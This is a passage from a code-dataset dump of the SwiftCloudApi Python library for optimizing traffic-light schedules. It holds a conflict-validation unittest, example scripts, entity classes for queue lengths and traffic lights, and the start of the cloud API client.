SafetyViolation(f\"Periodic order {periodic_order.to_json()} is violated\")\n prev_switch = switch\n"
},
{
"alpha_fraction": 0.6073307991027832,
"alphanum_fraction": 0.629511296749115,
"avg_line_length": 55,
"blob_id": "3b92becfa6a0cb36684cc62d5d822e1a3f5e60ee",
"content_id": "a3e8ff446d58821be16aa774eae33956dbb13d7c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5320,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 95,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_conflicts.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom itertools import product\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.validate_safety_restrictions.validate_conflicts import validate_conflicts\n\n\nclass TestFTSConflictValidation(unittest.TestCase):\n \"\"\" unittests for validating satisfying conflicts and the associated minimum clearance times \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n def test_conflict_satisfied(self) -> None:\n \"\"\"\n test that validations pass if constraints are satisfied\n :return:\n \"\"\"\n # GIVEN\n signalgroup1 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[conflict])\n\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=90, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=33, end_greenyellow=60)],\n sg2=[GreenYellowInterval(start_greenyellow=12, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=62, end_greenyellow=87)]), period=100)\n\n for interval_shift in range(2):\n with self.subTest(f\"interval_shift={interval_shift}\"):\n fts._greenyellow_intervals[\"sg2\"] = \\\n fts._greenyellow_intervals[\"sg2\"][:interval_shift] + \\\n fts._greenyellow_intervals[\"sg2\"][interval_shift:]\n # WHEN validating\n validate_conflicts(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_violating_conflict(self) -> None:\n \"\"\"\n test that validations fails if minimum clearance times are violated.\n \"\"\"\n # GIVEN\n signalgroup1 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[conflict])\n\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=90, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=33, end_greenyellow=60)],\n sg2=[GreenYellowInterval(start_greenyellow=12, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=62, end_greenyellow=87)]), period=100)\n\n for signalgroup_id, interval_index, interval_shift in product([\"sg1\", \"sg2\"], [0, 1], [0]):\n with self.subTest(f\"signalgroup_id={signalgroup_id}, interval_index={interval_index}, \"\n f\"interval_shift={interval_shift}\"):\n # adjusting schedule such 
that the start of greenyellow interval 'interval_index' of signalgroup_id\n # violates the minimum clearance time\n fts_copy = deepcopy(fts)\n if signalgroup_id == \"sg1\":\n fts_copy._greenyellow_intervals[\"sg1\"][interval_index].start_greenyellow = \\\n (fts_copy._greenyellow_intervals[\"sg2\"][(interval_index + 1) % 2].end_greenyellow +\n conflict.setup21 - 1) % fts_copy.period\n if signalgroup_id == \"sg2\":\n fts_copy._greenyellow_intervals[\"sg2\"][interval_index].start_greenyellow = \\\n (fts_copy._greenyellow_intervals[\"sg1\"][interval_index].end_greenyellow +\n conflict.setup12 - 1) % fts_copy.period\n\n fts_copy._greenyellow_intervals[\"sg2\"] = fts_copy._greenyellow_intervals[\"sg2\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg2\"][interval_shift:]\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_conflicts(intersection=intersection, fts=fts_copy)\n\n # THEN an error should be raised\n"
},
{
"alpha_fraction": 0.7344650626182556,
"alphanum_fraction": 0.7392696738243103,
"avg_line_length": 47.03076934814453,
"blob_id": "a5ab48ddc9b1735d0b39f99a6197d1b0fcbcd29d",
"content_id": "b5db798325b2f08edbc29e9955fad83426ddbafe",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3122,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 65,
"path": "/swift_cloud_py/examples/optimize_multiple_schedules.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef optimize_multiple_schedules():\n \"\"\"\n Example showing how to:\n - retrieve intersection information and arrival rates from a json file exported from Swift Mobility Desktop.\n - use this information to optimize fixed-time schedules\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing average experienced delay\")\n best_fixed_time_schedule, best_phase_diagram, objective_value, warm_start_info = \\\n SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n logging.info(best_fixed_time_schedule)\n logging.info(best_phase_diagram)\n\n logging.info(f\"Finding second best schedule\")\n second_best_fixed_time_schedule, second_best_phase_diagram, objective_value, warm_start_info = \\\n SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, fixed_time_schedules_to_exclude=[best_fixed_time_schedule],\n warm_start_info=warm_start_info)\n\n logging.info(f\"Average experienced delay of second best schedule: {objective_value:.2f} seconds\")\n logging.info(second_best_fixed_time_schedule)\n logging.info(second_best_phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n optimize_multiple_schedules()\n"
},
{
"alpha_fraction": 0.7168891429901123,
"alphanum_fraction": 0.7266427278518677,
"avg_line_length": 50.9466667175293,
"blob_id": "ba100c230a97c4eb18097c8f6c4178fadf11eb53",
"content_id": "f2717f5383b8524cbb55ff320dcc911ed3ee0747",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3896,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 75,
"path": "/swift_cloud_py/examples/tune_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef tune_fixed_time_schedule(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example we show how to tune a fixed-time schedule.\n\n Use case: Traffic situations change throughout the day. This function allows you to quickly adapt the green times\n of an existing fixed-time schedule to a new traffic situations. This can be used, for example, to adapt the\n maximum greenyellow times of a smart traffic light controller to the current traffic situation in real-time.\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # the more the traffic situation changes, the more effect tuning the fixed-time schedule has. 
In this example,\n # we only scale the amount of traffic.\n for scaling_factor in [0.95, 0.9, 0.7, 0.4]:\n logging.info(f\"Evaluating schedule for situation with {(1-scaling_factor)*100 :.1f}% less traffic\")\n\n arrival_rates_scaled = arrival_rates * scaling_factor\n\n kpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=arrival_rates_scaled, horizon=2)\n\n logging.info(f\"Average experienced delay without tuning: {kpis.delay:.2f} seconds\")\n\n logging.info(f\"Tuning schedule for situation with {(1-scaling_factor)*100 :.1f}% less traffic\")\n\n tuned_fixed_time_schedule, objective_value = SwiftMobilityCloudApi.get_tuned_fts(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule, arrival_rates=arrival_rates_scaled,\n min_period_duration=30, max_period_duration=180, objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay after tuning: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n"
},
{
"alpha_fraction": 0.6846493482589722,
"alphanum_fraction": 0.721677303314209,
"avg_line_length": 54.10810852050781,
"blob_id": "10e9a23c1467c47994512d8ef14a66f1eaf74f0e",
"content_id": "38433cd88265409eda3644325a1dac34c5b66998",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4078,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 74,
"path": "/swift_cloud_py/examples/fixing_periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef fix_order_and_optimize():\n \"\"\"\n This example shows how to ask for a fixed-time schedule that adheres to a specified fix order in which\n the signalgroups should receive their greenyellow interval.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # signal group consisting of two traffic light allowing 1 or 2 greenyellow intervals per repeating period.\n traffic_light1 = TrafficLight(capacity=1800, lost_time=2.2)\n traffic_light2 = TrafficLight(capacity=1810, lost_time=2.1)\n signalgroup1 = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100, min_nr=1, max_nr=2)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light3 = TrafficLight(capacity=1650, lost_time=3.0)\n signalgroup2 = SignalGroup(id=\"5\", traffic_lights=[traffic_light3], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light4 = TrafficLight(capacity=1800, lost_time=2.1)\n signalgroup3 = SignalGroup(id=\"8\", traffic_lights=[traffic_light4], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # conflicts & clearance times\n conflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=2)\n conflict13 = Conflict(id1=signalgroup1.id, id2=signalgroup3.id, setup12=2, setup21=1)\n conflict23 = Conflict(id1=signalgroup2.id, id2=signalgroup3.id, setup12=2, setup21=3)\n\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n\n # set associated arrival rates\n arrival_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [150], \"8\": [180]})\n logging.info(f\"Not yet requesting any fixed order of greenyellow intervals\")\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n logging.info(f\"Requesting order: 2 -> 8 -> 5 -> \")\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23],\n periodic_orders=[PeriodicOrder(order=[\"2\", \"8\", \"5\"])])\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n 
intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n fix_order_and_optimize()\n"
},
{
"alpha_fraction": 0.6581421494483948,
"alphanum_fraction": 0.6581421494483948,
"avg_line_length": 49.1698112487793,
"blob_id": "9b9a8f1de0dad8db4e63ecc2a108ba34247c3f2c",
"content_id": "f48554d4880d1e1efbbf7f5152e3833c26087058",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 53,
"path": "/swift_cloud_py/entities/scenario/queue_lengths.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using ArrivalRates-typing inside ArrivalRates-class\n\nfrom typing import Dict, List\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\nclass QueueLengths:\n \"\"\"Arrival rates of all traffic lights\"\"\"\n def __init__(self, id_to_queue_lengths: Dict[str, List[float]]) -> None:\n \"\"\"\n :param id_to_queue_lengths: mapping of signalgroup id to a list of queue lengths (in personal car equivalent)\n for the associated traffic lights (in signalgroup.traffic_lights);\n We include these queue lengths implicitly in the arrival rate of this queue: we assume that the traffic in\n the initial queue arrives (evenly spread) during the horizon.\n return: -\n \"\"\"\n self.id_to_queue_lengths = id_to_queue_lengths\n\n # raises ValueError if validation does not succeed\n self._validate()\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.id_to_queue_lengths\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of QueueLengths; raises ValueError if validation does not pass\"\"\"\n # validate structure of id_to_queue_lengths\n error_message = \"id_to_queue_lengths should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of queue lengths (List[float])\"\n if not isinstance(self.id_to_queue_lengths, dict):\n raise ValueError(error_message)\n for _id, queue_lengths in self.id_to_queue_lengths.items():\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(queue_lengths, list):\n raise ValueError(error_message)\n for queue_length in queue_lengths:\n if not isinstance(queue_length, (float, int)):\n raise ValueError(error_message)\n\n @staticmethod\n def from_json(queue_lengths_dict) -> QueueLengths:\n \"\"\"Loading arrival rates from json (expected same json structure as generated with to_json)\"\"\"\n return QueueLengths(id_to_queue_lengths=queue_lengths_dict)\n\n def __truediv__(self, time: float) -> ArrivalRates:\n \"\"\" divide the queue length by a time interval ('other' in hours) to get a rate in PCE/h\"\"\"\n if not isinstance(time, (int, float)):\n raise ArithmeticError(\"can divide queue_lengths rates only by float\")\n id_to_arrival_rates = {id_: [rate/time for rate in rates] for id_, rates in self.id_to_queue_lengths.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n"
},
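The division operator defined in the QueueLengths class above is how waiting traffic is folded into demand: a queue (in PCE) divided by a horizon (in hours) yields an ArrivalRates object in PCE/h. A minimal usage sketch, assuming the package is installed so the import resolves (the id and numbers are illustrative, not from the source):

from swift_cloud_py.entities.scenario.queue_lengths import QueueLengths

# 10 PCE initially waiting at the single traffic light of signal group "2"
queues = QueueLengths(id_to_queue_lengths={"2": [10.0]})

# spread that queue over a 2-hour horizon -> 5 PCE/h of extra demand
extra_rates = queues / 2.0
print(extra_rates.id_to_arrival_rates)  # {'2': [5.0]}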
{
"alpha_fraction": 0.6608046889305115,
"alphanum_fraction": 0.6650679707527161,
"avg_line_length": 56.738460540771484,
"blob_id": "d74eef56f06701218304b3eeb490f505e48ef24e",
"content_id": "8aeaa76f062c24c191c7c60bc421b87bdb3f969b",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3753,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 65,
"path": "/swift_cloud_py/entities/intersection/traffic_light.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using TrafficLight-typing inside TrafficLight-class\n\nfrom typing import Optional, Dict\n\n\nclass TrafficLight:\n def __init__(self, capacity: float, lost_time: float, weight: Optional[float] = 1.0,\n max_saturation: Optional[float] = None) -> None:\n \"\"\"\n Traffic light object for which we want to plan greenyellow intervals. A greenyellow interval is a generic\n representation of the green interval itself and any other signal state (other than the pure red signal state)\n leading up to or following the green interval. For example, in the Netherlands the greenyellow interval would\n consist of the green interval followed by a yellow interval. In the UK, this greenyellow interval would consist\n of a yellow-red interval, followed by a green interval, succeeded by a yellow interval.\n :param capacity: capacity in PCE/h (personal car equivalent per hour)\n :param lost_time: time (in seconds) that is 'lost' every greenyellow interval due to accelerations (at start)\n and people stopping before the end of the yellow interval (if yellow follows green); the amount of PCE that\n is expected to depart during a greenyellow interval of gy seconds is (gy - lost_time) * capacity\n :param weight: importance of this traffic light (larger means more important); only relevant when\n minimizing the expected waiting time (delay) at the traffic lights; the delay at a traffic light with weight=2.0\n counts twice as hard as a delay at a traffic light with weight=1.0.\n :param max_saturation: maximum allowed saturation (1.0 is at the verge of oversaturation).\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.capacity = float(capacity) # store capacity in PCE/second (instead of PCE/h)\n self.max_saturation = float(max_saturation) if max_saturation is not None else None\n self.lost_time = float(lost_time)\n self.weight = float(weight)\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n # dict creates copy preventing modifying original object\n json_dict = dict(self.__dict__)\n # moreover we remove items with None value; the max saturation should not be specified in the cloud-api\n # if it is None\n if self.max_saturation is None:\n del json_dict[\"max_saturation\"]\n return json_dict\n\n @staticmethod\n def from_json(traffic_light_dict: Dict) -> TrafficLight:\n \"\"\"Loading traffic light from json (expected same json structure as generated with to_json)\"\"\"\n return TrafficLight(capacity=traffic_light_dict[\"capacity\"],\n lost_time=traffic_light_dict[\"lost_time\"],\n weight=traffic_light_dict[\"weight\"],\n max_saturation=traffic_light_dict[\"max_saturation\"]\n if \"max_saturation\" in traffic_light_dict else None)\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises error if validation does not pass)\n \"\"\"\n if self.max_saturation is not None and self.max_saturation <= 0.0:\n raise ValueError(\"max_saturation must be None or a positive float\")\n\n if not self.weight >= 0.0:\n raise ValueError(\"weight must be a non-negative float\")\n\n if not self.capacity > 0.0:\n raise ValueError(\"capacity must be a positive float\")\n\n if not self.lost_time >= 0.0:\n raise ValueError(\"lost_time must be a non-negative float\")\n"
},
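The departure model in the TrafficLight docstring above is easy to mis-unit: capacity is documented in PCE/h, while greenyellow and lost times are in seconds. A small worked example of the (gy - lost_time) * capacity formula, with the capacity explicitly converted to PCE per second first (plain Python; the numbers are illustrative, not taken from the source):

capacity_pce_per_hour = 1800.0  # saturation flow of one traffic light
lost_time = 2.2                 # seconds lost per greenyellow interval
gy = 30.0                       # greenyellow duration in seconds

# convert to PCE/second so the units in (gy - lost_time) * capacity match
capacity_pce_per_second = capacity_pce_per_hour / 3600.0
departures = (gy - lost_time) * capacity_pce_per_second
print(f"expected departures: {departures:.1f} PCE")  # ~13.9 PCE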
{
"alpha_fraction": 0.6732481718063354,
"alphanum_fraction": 0.6776306629180908,
"avg_line_length": 59.04709243774414,
"blob_id": "2aef76d7ea887d976b3edc018bc9fb4a8108e371",
"content_id": "3f7c6b9dfb59cee8eeeeb1c5872456e5dee17b17",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21677,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 361,
"path": "/swift_cloud_py/swift_cloud_api.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nfrom typing import Tuple, Optional, List, Dict\n\nimport requests\nfrom requests import Response\n\nfrom swift_cloud_py.authentication.authentication import authenticate\nfrom swift_cloud_py.common.errors import UnauthorizedException, BadRequestException, \\\n UnknownCloudException, SafetyViolation\nfrom swift_cloud_py.authentication.check_internet_connection import ensure_has_internet\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.control_output.phase_diagram import PhaseDiagram\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.kpis.kpis import KPIs\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\nfrom swift_cloud_py.enums import ObjectiveEnum\n\n# allows using a test version of the api hosted at a different url (for testing purposes).\nfrom swift_cloud_py.validate_safety_restrictions.validate import validate_safety_restrictions\n\nCLOUD_API_URL = os.environ.get(\"smc_api_url\", \"https://cloud-api.swiftmobility.eu\")\n\nCONNECTION_ERROR_MSG = \"Connection with swift mobility cloud api could not be established\"\nHORIZON_LB_EXCEEDED_MSG = \"horizon should exceed one hour\"\n\n\ndef check_status_code(response: Response) -> None:\n \"\"\"\n check status code returned by rest-api call; raises appropriate error if status code indicates that the call was\n not succesfull.\n \"\"\"\n if response.status_code in [400]:\n raise BadRequestException(str(response.json()))\n elif response.status_code in [401]:\n raise UnauthorizedException(\"JWT validation failed: Missing or invalid credentials\")\n elif response.status_code in [402]:\n raise UnauthorizedException(\"Insufficient credits (cpu seconds) left.\")\n elif response.status_code in [403]:\n raise UnauthorizedException(\"Forbidden.\")\n elif response.status_code in [426]:\n raise UnauthorizedException(f\"The cloud api is still in the beta phase; this means it might change. 
\"\n f\"Message from cloud: {response.json()['msg']}.\")\n elif response.status_code in [504]:\n raise TimeoutError\n elif response.status_code != 200:\n raise UnknownCloudException(f\"Unknown status code (={response.status_code}) returned\")\n\n\nclass SwiftMobilityCloudApi:\n \"\"\"\n Class to communicate with the cloud-api of swift mobility (and automating authentication).\n Using this class simplifies the communication with the cloud-api (compared to using the rest-api's directly)\n \"\"\"\n _authentication_token: str = None # this token is updated by the @authenticate decorator\n\n @classmethod\n def get_authentication_header(cls):\n return {'authorization': 'Bearer {0:s}'.format(cls._authentication_token)}\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_optimized_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n horizon: float = 2.0,\n min_period_duration: float = 0.0, max_period_duration: float = 180,\n objective: ObjectiveEnum = ObjectiveEnum.min_delay,\n initial_queue_lengths: Optional[QueueLengths] = None,\n fixed_time_schedules_to_exclude: Optional[List[FixedTimeSchedule]] = None,\n warm_start_info: Optional[Dict] = None,\n ) -> Tuple[FixedTimeSchedule, PhaseDiagram, float, dict]:\n \"\"\"\n Optimize a fixed-time schedule\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param horizon: time period of interest in hours.\n :param min_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param max_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param objective: what kpi (key performance indicator) to optimize. The following options are available:\n - ObjectiveEnum.min_delay: minimize the delay experienced by road users arriving at the intersection during\n the next 'horizon' hours. The initially waiting traffic is modeled as implicitly by increasing the\n arrival rate by initial_queue_length / horizon PCE/h; this implies that we assume that this traffic is arriving\n (evenly spread) during the horizon.\n - ObjectiveEnum.min_period: search for the fixed-time schedule with the smallest period duration for which\n all traffic lights are 'stable', i.e., the greenyellow interval is large enough so that the amount of traffic\n that can (on average) depart during the horizon exceeds the traffic that arrives during\n the horizon (+ initially waiting traffic).\n - ObjectiveEnum.max_capacity: search for the fixed-time schedule that can handle the largest (percentual)\n increase in traffic (including the initial amount of traffic), i.e., the largest percentual increase in traffic\n for which all traffic lights are 'stable' (see also ObjectiveEnum.min_period). This objective function\n disregards the maximum saturation of each traffic light (we assume the maximum saturation is 1 for each\n traffic light).\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic. 
The unit of each queue-length should align with the unit used for the arrival rate;\n if the arrival rate is specified in PCE/h then the queue-length needs to be specified in PCE.\n :return: fixed-time schedule, associated phase diagram and the objective value\n (minimized delay, minimized period, or maximum percentual increase in traffic divided by 100, e.g. 1 means\n currently at the verge of stability)\n :param fixed_time_schedules_to_exclude: the fixed-time schedules that we want to exclude; this can be used to find\n the second best schedule by excluding the best one.\n :param warm_start_info: each optimization returns some information\n (usually in the format {\"id\": \"some identification string\"}); if you want to compute the second best schedule\n (by excluding the best schedule), then you can also provide the warm_start_info returned with the best schedule;\n this will significantly speedup computations when trying to find the second best one.\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n if fixed_time_schedules_to_exclude is not None:\n for fixed_time_schedule in fixed_time_schedules_to_exclude:\n try:\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n except SafetyViolation as e:\n logging.error(f\"One of the fixed-time schedules in fixed_time_schedules_to_exclude' does not\"\n f\"satisfy all safety restrictions. 
